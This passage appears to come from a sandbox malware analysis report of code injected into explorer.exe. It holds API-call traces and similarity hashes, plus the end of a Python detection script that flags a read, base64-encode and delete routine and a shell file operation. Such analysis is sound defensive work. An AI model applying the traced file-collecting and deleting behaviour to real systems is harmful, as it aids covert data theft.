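    return [c for c in map(parse_api_line, text.splitlines()) if c is not None]


def find_read_encode_delete(calls: List[ApiCall]) -> Optional[dict]:
    """ReadFile + CryptBinaryToStringA(base64) + DeleteFileW in one record:
    file content is read, base64-encoded, and the file is removed."""
    funcs = {c.func for c in calls}
    b64 = [c for c in calls
           if c.func == "CryptBinaryToStringA" and len(c.args) > 2
           and c.args[2] is not None
           and (c.args[2] & 0xFF) == CRYPT_STRING_BASE64]  # assumption: low byte = format
    if {"ReadFile", "DeleteFileW"} <= funcs and b64:
        return {"rule": "read_base64_delete", "encode_refs": [c.ref for c in b64]}
    return None


def find_shfileop(calls: List[ApiCall]) -> Optional[dict]:
    """RtlZeroMemory(?, 0x1E) then SHFileOperationW: the 30-byte buffer matches
    a 32-bit SHFILEOPSTRUCTW, so the routine performs a shell file operation."""
    direct = sorted((k for k in calls if k.subcall_of is None), key=lambda k: k.ref)
    zero_ref = None
    for c in direct:
        if c.func == "RtlZeroMemory" and len(c.args) > 1 and c.args[1] == SHFILEOPSTRUCTW_SIZE_X86:
            zero_ref = c.ref
        elif c.func == "SHFileOperationW" and zero_ref is not None:
            return {"rule": "shfileop_struct", "zero_ref": zero_ref, "op_ref": c.ref}
    return None


def analyse(text: str) -> List[dict]:
    calls = parse_record(text)
    return [f for f in (find_read_encode_delete(calls), find_shfileop(calls)) if f]


# Test input: the two "APIs" listings copied from this report.
RECORD_1704 = """\
• ReadFile.KERNEL32(?,?,?,?,E8014E8D), ref: 030C1704
• CloseHandle.KERNEL32(?,?,?,?,?,E8014E8D), ref: 030C1754
• DeleteFileW.KERNEL32(00000000), ref: 030C175B
  • Part of subcall function 030C1221: CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?), ref: 030C123B
  • Part of subcall function 030C1221: CryptBinaryToStringA.CRYPT32(?,?,00000001,00000000,?,?,?,00000001,00000000,?), ref: 030C125B
"""
RECORD_1786 = """\
• RtlZeroMemory.NTDLL(?,0000001E), ref: 030C1786
• lstrlenW.KERNEL32(033D3FE8), ref: 030C1794
• SHFileOperationW.SHELL32(?), ref: 030C17AE
"""

if __name__ == "__main__":
    for name, rec in (("030C1704", RECORD_1704), ("030C1786", RECORD_1786)):
        print(name, analyse(rec))
```

The second rule only establishes that a SHFILEOPSTRUCTW is initialised and handed to SHFileOperationW; the report shows the wFunc and path arguments as "?", so the finding should be read as "shell file operation", not as a confirmed delete or move.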

Control-flow Graph
APIs
• VirtualAlloc.KERNEL32(00000000,?,00003000), ref: 030C1056
• lstrlen.KERNEL32(?,00000000,00000000,?,00000025,030C1C25,?,?), ref: 030C109D
• MultiByteToWideChar.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,?,00000025,030C1C25,?,?), ref: 030C10BA
Memory Dump Source
• Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
Similarity
• API ID: AllocByteCharMultiVirtualWidelstrlen
• String ID:
• API String ID: 1936347974-0
• Opcode ID: b8c23af5acfebe8b942ba4e0a1ebb1198e458300b02cec315c3cc44fd9d76091
• Instruction ID: d2e0e87bf312aa83d3563facaa139ef1a8efa247e1239660bd7d4b418d261abe
• Opcode Fuzzy Hash: b8c23af5acfebe8b942ba4e0a1ebb1198e458300b02cec315c3cc44fd9d76091
• Instruction Fuzzy Hash: BCF027353132827AEA086B265C4CF9F2F5CDBC1746F200018B9019A042CAD4680545A0

Control-flow Graph
• Graph summary (edge list not reproduced): function at 30c27a9, basic blocks 30c27a9-30c2c7b; calls 30c329f, 30cadb0, 30c3b59, 30c250e, 30c2451, 30c260f, 30cae3b, 30c24f0 (repeatedly), 30c4153 and 30c390e
APIs
Memory Dump Source
• Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
Similarity
• API ID: _malloc_strlen
• String ID:
• API String ID: 1889909783-0
• Opcode ID: 6e8f00cb2e9fb69e4b55014dac20dec2b877d8e6bbc91019dace5275909309d4
• Instruction ID: df1f9d5018ca08d67f10a7f889c7bd25bf85da38e1ff796052a3db8a50ae3e5e
• Opcode Fuzzy Hash: 6e8f00cb2e9fb69e4b55014dac20dec2b877d8e6bbc91019dace5275909309d4
• Instruction Fuzzy Hash: ADE1B375611741ABDF21DF68C941BEEB7E9BFC4710F148C1DEA9A9BAC0DB70A8418B10

Control-flow Graph
• Graph summary (edge list not reproduced): function at 30c268d, basic blocks 30c268d-30c276b; calls 30d0400, 30c3d93, 30c3ae0, 30c23a0, 30cae3b, 30ccd40 and 30c25a2
APIs
• _malloc.LIBCMT ref: 030C2728
  • Part of subcall function 030CAE3B: __FF_MSGBANNER.LIBCMT ref: 030CAE52
  • Part of subcall function 030CAE3B: __NMSG_WRITE.LIBCMT ref: 030CAE59
  • Part of subcall function 030CAE3B: RtlAllocateHeap.NTDLL(033D0000,00000000,00000001), ref: 030CAE7E
• _memmove.LIBCMT ref: 030C2754
Memory Dump Source
• Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
Similarity
• API ID: AllocateHeap_malloc_memmove
• String ID:
• API String ID: 3795339465-0
• Opcode ID: 90531af6d4d711a65fab11b70f7bd40444ce687cdca4a91a65f1bd7e24fdf871
• Instruction ID: b302aae98a6ad2e978cede6ec1e572a107fb5d44f0cc01ee3c5741fd488cabd4
• Opcode Fuzzy Hash: 90531af6d4d711a65fab11b70f7bd40444ce687cdca4a91a65f1bd7e24fdf871
• Instruction Fuzzy Hash: E7213275D1126D9BCF61DF95CC80ADEB7B8BB58200F4006EEE489B6140DBB456C18FA0

Control-flow Graph
• Graph summary (edge list not reproduced): function at 30c3956, basic blocks 30c3956-30c39a5; no internal calls; API calls SetFilePointer and, on the error path, GetLastError
APIs
• SetFilePointer.KERNEL32(?,?,?,?), ref: 030C3973
• GetLastError.KERNEL32(?,?,?,?), ref: 030C3980
Memory Dump Source
• Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
Similarity
• API ID: ErrorFileLastPointer
• String ID:
• API String ID: 2976181284-0
• Opcode ID: 4aa8c2fb9ae5572bae8bdd882d5c17f034f7d2a43e3c8f0ad6d9c76268b55470
• Instruction ID: 8dda4979775298590bb8e814a7c80a43041be84dfab3b2e5c6ab37e840a773dd
• Opcode Fuzzy Hash: 4aa8c2fb9ae5572bae8bdd882d5c17f034f7d2a43e3c8f0ad6d9c76268b55470
• Instruction Fuzzy Hash: 19F0907A612719AB8714DFA9EC8896EFBE8EF89361B10826DFC19C3250D7318D10C690
APIs
• WriteFile.KERNEL32(?,?,?,00000000,00000000), ref: 030C3931
• GetLastError.KERNEL32 ref: 030C393B
Memory Dump Source
• Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID:
• API String ID: 442123175-0
APIs
• OpenFileMappingA.KERNEL32(00000006,00000000,00000000), ref: 030C118F
• MapViewOfFile.KERNEL32(00000000,00000006,00000000,00000000,00000000,?,00040745,030C1E0A), ref: 030C11A1
Memory Dump Source
• Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
Similarity
• API ID: File$MappingOpenView
• String ID:
• API String ID: 3439327939-0
APIs
  • Part of subcall function 030C11C4: VirtualQuery.KERNEL32(033D3FE8,030C1019,0000001C,030C1019,00000000,030C1CEB,?,?), ref: 030C11D1
• GetProcessHeap.KERNEL32(00000000,033D3FE8,00000000,030C1CEB,?,?), ref: 030C1020
• RtlFreeHeap.NTDLL(00000000,?,?), ref: 030C1027
Memory Dump Source
• Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
Similarity
• API ID: Heap$FreeProcessQueryVirtual
• String ID:
• API String ID: 2580854192-0
APIs
• GetProcessHeap.KERNEL32(00000008,00000208,030C1AB2,?,?), ref: 030C1003
• RtlAllocateHeap.NTDLL(00000000,?,?), ref: 030C100A
Memory Dump Source
• Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
Similarity
• API ID: Heap$AllocateProcess
• String ID:
• API String ID: 1357844191-0
Memory Dump Source
• Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
APIs
• RtlZeroMemory.NTDLL(?,00000018), ref: 030C12C4
Memory Dump Source
• Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
Similarity
• API ID: MemoryZero
• String ID:
• API String ID: 816449071-0
APIs
Memory Dump Source
• Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
Similarity
• API ID: _memset
• String ID:
• API String ID: 2102423945-0
APIs
• RtlExitUserThread.NTDLL(00000000), ref: 030C1A8F
  • Part of subcall function 030C18E0: lstrcatW.KERNEL32(00000208,00000000,00000000,00000000,?,00000000), ref: 030C192C
  • Part of subcall function 030C18E0: PathCombineW.SHLWAPI(00000000,00000000,*.*,?,00000000), ref: 030C193C
  • Part of subcall function 030C18E0: FindFirstFileExW.KERNEL32(00000000,00000001,?,00000000,00000000,00000002,?,00000000), ref: 030C195E
  • Part of subcall function 030C18E0: lstrcmpiW.KERNEL32(?,?,00000000), ref: 030C1995
  • Part of subcall function 030C18E0: PathCombineW.SHLWAPI(00000410,00000208,?,?,?,00000000), ref: 030C19BC
  • Part of subcall function 030C18E0: FindNextFileW.KERNEL32(00000000,?,?,00000000), ref: 030C1A42
  • Part of subcall function 030C18E0: FindClose.KERNEL32(00000000,?,00000000), ref: 030C1A51
  • Part of subcall function 030C1011: GetProcessHeap.KERNEL32(00000000,033D3FE8,00000000,030C1CEB,?,?), ref: 030C1020
  • Part of subcall function 030C1011: RtlFreeHeap.NTDLL(00000000,?,?), ref: 030C1027
Memory Dump Source
• Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
Similarity
• API ID: Find$CombineFileHeapPath$CloseExitFirstFreeNextProcessThreadUserlstrcatlstrcmpi
• String ID:
• API String ID: 3936785612-0
APIs
• _malloc.LIBCMT ref: 030C760F
  • Part of subcall function 030CAE3B: __FF_MSGBANNER.LIBCMT ref: 030CAE52
  • Part of subcall function 030CAE3B: __NMSG_WRITE.LIBCMT ref: 030CAE59
  • Part of subcall function 030CAE3B: RtlAllocateHeap.NTDLL(033D0000,00000000,00000001), ref: 030CAE7E
Memory Dump Source
• Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
Similarity
• API ID: AllocateHeap_malloc
• String ID:
• API String ID: 501242067-0
APIs
• _free.LIBCMT ref: 030C761F
  • Part of subcall function 030C88FA: RtlFreeHeap.NTDLL(00000000,00000000,?,030C7CD5,00000000,00010108,0000000B,?,00000000,033D3FE8), ref: 030C890E
  • Part of subcall function 030C88FA: GetLastError.KERNEL32(00000000,?,030C7CD5,00000000,00010108,0000000B,?,00000000,033D3FE8), ref: 030C8920
Memory Dump Source
• Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
Similarity
• API ID: ErrorFreeHeapLast_free
• String ID:
• API String ID: 1353095263-0
APIs
• lstrlenW.KERNEL32(033D3FE8,?,?,00000000,033D3FE8,00000104), ref: 030C2346
  • Part of subcall function 030C2240: FindFirstFileW.KERNEL32(?,?,030DBA98,?,00000000,033D3FE8), ref: 030C2278
  • Part of subcall function 030C2240: FindNextFileW.KERNEL32(00000000,?), ref: 030C22F9
  • Part of subcall function 030C2240: FindClose.KERNEL32(00000000), ref: 030C2304
Memory Dump Source
• Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
Similarity
• API ID: Find$File$CloseFirstNextlstrlen
• String ID:
• API String ID: 1108763488-0
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 030C3956: SetFilePointer.KERNEL32(?,?,?,?), ref: 030C3973
                                                                                                                                        • Part of subcall function 030C3956: GetLastError.KERNEL32(?,?,?,?), ref: 030C3980
                                                                                                                                      • GetLastError.KERNEL32 ref: 030C39DD
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ErrorLast$FilePointer
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1156039329-0
                                                                                                                                      • Opcode ID: 2bca29f77effa4d093f5559fe3cfecfc40cbeb38c290751106743d6d13e63167
                                                                                                                                      • Instruction ID: 907224474aec3560f838fdc8b4843671cd0ef2babbdf9b7206d1054b0cfb3ef0
                                                                                                                                      • Opcode Fuzzy Hash: 2bca29f77effa4d093f5559fe3cfecfc40cbeb38c290751106743d6d13e63167
                                                                                                                                      • Instruction Fuzzy Hash: 24F0BB3AA22248ABDB40DB9DC8019DEFBB9EF49620F14C399FC10A7244E7716D9087D0
                                                                                                                                      APIs
                                                                                                                                      • VirtualAlloc.KERNEL32(00000000,?,00003000), ref: 030C1056
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AllocVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 4275171209-0
                                                                                                                                      • Opcode ID: 37d3749fd8f957914923e944d537d95a79c4797b28ff1ff09ffd7802f5fa3ad5
                                                                                                                                      • Instruction ID: c771a085cf374e2cdab8897d7e1173b1268ab34dbf0de00eb3d06f194cd03018
                                                                                                                                      • Opcode Fuzzy Hash: 37d3749fd8f957914923e944d537d95a79c4797b28ff1ff09ffd7802f5fa3ad5
                                                                                                                                      • Instruction Fuzzy Hash: FFA002B07D73007AFD696791AD1FF152E689B41F42F100184BB0DBC0C456E87554856D
                                                                                                                                      APIs
                                                                                                                                      • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 030C1065
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FreeVirtual
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1263568516-0
                                                                                                                                      • Opcode ID: deec34f9970177696f05e9b42e2e393424aa8999fc55f978d383a4bebea132b0
                                                                                                                                      • Instruction ID: 4e357a25ec1a2ce396ffe223cc0f0b3f287a407de32dd689449ea2d8a2e6eb35
                                                                                                                                      • Opcode Fuzzy Hash: deec34f9970177696f05e9b42e2e393424aa8999fc55f978d383a4bebea132b0
                                                                                                                                      • Instruction Fuzzy Hash: 00A0027469270066FD7467245D1AF0926546B42B05F2085447A41681C44AA9A0148A18
                                                                                                                                      APIs
                                                                                                                                      • FindFirstFileW.KERNEL32(?,?), ref: 030C20D6
                                                                                                                                      • FileTimeToLocalFileTime.KERNEL32(?,?,?,?), ref: 030C20EE
                                                                                                                                      • FileTimeToDosDateTime.KERNEL32(?,?), ref: 030C20FD
                                                                                                                                      • FindClose.KERNEL32(00000000,?,?,?), ref: 030C2104
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: FileTime$Find$CloseDateFirstLocal
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 2659516521-0
                                                                                                                                      • Opcode ID: 89353ef2ca0f44d8b13409a5d6bd033f117f36f36388c67427a03aeb42604284
                                                                                                                                      • Instruction ID: a41d5366e8da006c71fbf632ecc10065370b6f32fbe88fb14ca93ec10d7a8706
                                                                                                                                      • Opcode Fuzzy Hash: 89353ef2ca0f44d8b13409a5d6bd033f117f36f36388c67427a03aeb42604284
                                                                                                                                      • Instruction Fuzzy Hash: 28F0A277402118ABD710B6A8EC4DDDF7BFCDB8A221F040666BE19D2144EB7495558BA0
                                                                                                                                      APIs
                                                                                                                                      • SetUnhandledExceptionFilter.KERNEL32(00000000,00000000,030C9222,-00000328,?,?,00000001), ref: 030C8DFA
                                                                                                                                      • UnhandledExceptionFilter.KERNEL32(?,?,?,00000001), ref: 030C8E03
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ExceptionFilterUnhandled
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3192549508-0
                                                                                                                                      • Opcode ID: 8b50865986c9b91c66cd4b5f2758ccaa53f308c1ea2bd12acc4538cda5f11be2
                                                                                                                                      • Instruction ID: c92bda5a1441018751ee9f98f4aef0a08a4fe23968262274f52dae9f80d48322
                                                                                                                                      • Opcode Fuzzy Hash: 8b50865986c9b91c66cd4b5f2758ccaa53f308c1ea2bd12acc4538cda5f11be2
                                                                                                                                      • Instruction Fuzzy Hash: 92B09231047208FBCB003B91FC09B587FA9FB06652F408010FE0D45055CB7654208AE2
                                                                                                                                      APIs
                                                                                                                                      • RtlDecodePointer.NTDLL ref: 030C7F2E
                                                                                                                                      • _free.LIBCMT ref: 030C7F47
                                                                                                                                        • Part of subcall function 030C88FA: RtlFreeHeap.NTDLL(00000000,00000000,?,030C7CD5,00000000,00010108,0000000B,?,00000000,033D3FE8), ref: 030C890E
                                                                                                                                        • Part of subcall function 030C88FA: GetLastError.KERNEL32(00000000,?,030C7CD5,00000000,00010108,0000000B,?,00000000,033D3FE8), ref: 030C8920
                                                                                                                                      • _free.LIBCMT ref: 030C7F5A
                                                                                                                                      • _free.LIBCMT ref: 030C7F78
                                                                                                                                      • _free.LIBCMT ref: 030C7F8A
                                                                                                                                      • _free.LIBCMT ref: 030C7F9B
                                                                                                                                      • _free.LIBCMT ref: 030C7FA6
                                                                                                                                      • _free.LIBCMT ref: 030C7FCA
                                                                                                                                      • RtlEncodePointer.NTDLL(033DCB30), ref: 030C7FD1
                                                                                                                                      • _free.LIBCMT ref: 030C7FE6
                                                                                                                                      • _free.LIBCMT ref: 030C7FFC
                                                                                                                                      • _free.LIBCMT ref: 030C8024
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free$Pointer$DecodeEncodeErrorFreeHeapLast
                                                                                                                                      • String ID: PNEw
                                                                                                                                      • API String ID: 3064303923-3542233003
                                                                                                                                      • Opcode ID: 0b5256638aced71a7a92f897f68db886f444f2d7ea4ccd29144a585226c12434
                                                                                                                                      • Instruction ID: 857e697909880c2c915404992e40d57cbc2fd163019f32e51a487ba3a5508f8d
                                                                                                                                      • Opcode Fuzzy Hash: 0b5256638aced71a7a92f897f68db886f444f2d7ea4ccd29144a585226c12434
                                                                                                                                      • Instruction Fuzzy Hash: 1C214C39A133A1CBD760FF6CF88055DB7E4BB45B34718813DED059A288CA3C5855CA88
                                                                                                                                      APIs
                                                                                                                                      • ___crtIsPackagedApp.LIBCMT ref: 030C7E54
                                                                                                                                      • AreFileApisANSI.KERNEL32(?,00000109,00000000,?,030D3675,00000008,00000000,00000000,?,030D360C,?,?,?,?,00000008,?), ref: 030C7E5D
                                                                                                                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000,?,00000109,00000000,?,030D3675,00000008,00000000,00000000,?,030D360C), ref: 030C7E77
                                                                                                                                      • GetLastError.KERNEL32(?,030D3675,00000008,00000000,00000000,?,030D360C,?,?,?,?,00000008,?,00000000,030DBFD0,00000014), ref: 030C7E84
                                                                                                                                      • __dosmaperr.LIBCMT ref: 030C7E8B
                                                                                                                                        • Part of subcall function 030C92F0: __getptd_noexit.LIBCMT ref: 030C92F0
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: ApisByteCharErrorFileLastMultiPackagedWide___crt__dosmaperr__getptd_noexit
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 1083238821-0
                                                                                                                                      • Opcode ID: a160398963f2fb27c428f82393a86234ae070e243b912451b9d0a74b88cc9e47
                                                                                                                                      • Instruction ID: 0922fc10d3747bb04df9fc623f81c06fb3cbacdcc7f11483d84400d62203d1ec
                                                                                                                                      • Opcode Fuzzy Hash: a160398963f2fb27c428f82393a86234ae070e243b912451b9d0a74b88cc9e47
                                                                                                                                      • Instruction Fuzzy Hash: 691193B7527345AFEB60BFB09C44BBE7ADCEF19B61B14452CFD51C9180EB3488008AA4
                                                                                                                                      APIs
                                                                                                                                      • __init_pointers.LIBCMT ref: 030C7D97
                                                                                                                                        • Part of subcall function 030C80F6: RtlEncodePointer.NTDLL(00000000), ref: 030C80F9
                                                                                                                                        • Part of subcall function 030C80F6: __initp_misc_winsig.LIBCMT ref: 030C8114
                                                                                                                                        • Part of subcall function 030C80F6: GetModuleHandleW.KERNEL32(kernel32.dll), ref: 030C8B4E
                                                                                                                                        • Part of subcall function 030C80F6: GetProcAddress.KERNEL32(00000000,FlsAlloc), ref: 030C8B62
                                                                                                                                        • Part of subcall function 030C80F6: GetProcAddress.KERNEL32(00000000,FlsFree), ref: 030C8B75
                                                                                                                                        • Part of subcall function 030C80F6: GetProcAddress.KERNEL32(00000000,FlsGetValue), ref: 030C8B88
                                                                                                                                        • Part of subcall function 030C80F6: GetProcAddress.KERNEL32(00000000,FlsSetValue), ref: 030C8B9B
                                                                                                                                        • Part of subcall function 030C80F6: GetProcAddress.KERNEL32(00000000,InitializeCriticalSectionEx), ref: 030C8BAE
                                                                                                                                        • Part of subcall function 030C80F6: GetProcAddress.KERNEL32(00000000,CreateEventExW), ref: 030C8BC1
                                                                                                                                        • Part of subcall function 030C80F6: GetProcAddress.KERNEL32(00000000,CreateSemaphoreExW), ref: 030C8BD4
                                                                                                                                        • Part of subcall function 030C80F6: GetProcAddress.KERNEL32(00000000,SetThreadStackGuarantee), ref: 030C8BE7
                                                                                                                                        • Part of subcall function 030C80F6: GetProcAddress.KERNEL32(00000000,CreateThreadpoolTimer), ref: 030C8BFA
                                                                                                                                        • Part of subcall function 030C80F6: GetProcAddress.KERNEL32(00000000,SetThreadpoolTimer), ref: 030C8C0D
                                                                                                                                        • Part of subcall function 030C80F6: GetProcAddress.KERNEL32(00000000,WaitForThreadpoolTimerCallbacks), ref: 030C8C20
                                                                                                                                        • Part of subcall function 030C80F6: GetProcAddress.KERNEL32(00000000,CloseThreadpoolTimer), ref: 030C8C33
                                                                                                                                        • Part of subcall function 030C80F6: GetProcAddress.KERNEL32(00000000,CreateThreadpoolWait), ref: 030C8C46
                                                                                                                                        • Part of subcall function 030C80F6: GetProcAddress.KERNEL32(00000000,SetThreadpoolWait), ref: 030C8C59
                                                                                                                                        • Part of subcall function 030C80F6: GetProcAddress.KERNEL32(00000000,CloseThreadpoolWait), ref: 030C8C6C
                                                                                                                                      • __mtinitlocks.LIBCMT ref: 030C7D9C
                                                                                                                                      • __mtterm.LIBCMT ref: 030C7DA5
                                                                                                                                        • Part of subcall function 030C7E0D: RtlDeleteCriticalSection.NTDLL ref: 030CA179
                                                                                                                                        • Part of subcall function 030C7E0D: _free.LIBCMT ref: 030CA180
                                                                                                                                        • Part of subcall function 030C7E0D: RtlDeleteCriticalSection.NTDLL(030DD918), ref: 030CA1A2
                                                                                                                                      • __calloc_crt.LIBCMT ref: 030C7DCA
                                                                                                                                      • __initptd.LIBCMT ref: 030C7DEC
                                                                                                                                      • GetCurrentThreadId.KERNEL32 ref: 030C7DF3
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$CriticalDeleteSection$CurrentEncodeHandleModulePointerThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm_free
                                                                                                                                      • String ID:
                                                                                                                                      • API String ID: 3567560977-0
                                                                                                                                      • Opcode ID: 065757ef35320ef7a3fbf064ea7a1d9b582c0545e03b4476e702c53d67ee4036
                                                                                                                                      • Instruction ID: 94f932aad60390cdc398f06ae362733f78afaad5acd76973952c6bea6e9f93b1
                                                                                                                                      • Opcode Fuzzy Hash: 065757ef35320ef7a3fbf064ea7a1d9b582c0545e03b4476e702c53d67ee4036
                                                                                                                                      • Instruction Fuzzy Hash: C9F0903613B7A12EE275FB747C0679E2AD4AF82A30F248A5DE874DC0C4FF9188525994
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free_mallocwcsncpy
                                                                                                                                      • String ID: .z%02d
                                                                                                                                      • API String ID: 3842812274-724465191
                                                                                                                                      • Opcode ID: 8dd9135576874e06e7e13132c04a4564ec4d80440b7b8302cebb9ca6862fbb39
                                                                                                                                      • Instruction ID: 0047c6559c15addc469e9e7b93ec271e440d60c97c714b2cd74eb9a38781962a
                                                                                                                                      • Opcode Fuzzy Hash: 8dd9135576874e06e7e13132c04a4564ec4d80440b7b8302cebb9ca6862fbb39
                                                                                                                                      • Instruction Fuzzy Hash: E311C639932359ABDB10DF58DC44EBFB7A8FB45720B44819DFD029B100D779A91886F4
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 0000000D.00000002.3926841297.00000000030C1000.00000040.80000000.00040000.00000000.sdmp, Offset: 030C1000, based on PE: false
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_13_2_30c1000_explorer.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _free_mallocstrncpy
                                                                                                                                      • String ID: .z%02u
                                                                                                                                      • API String ID: 854628082-1100895957
                                                                                                                                      • Opcode ID: 2dee296a4d131c82c3840ae1576a0d1a0ddccac591fde9801053666fb7124599
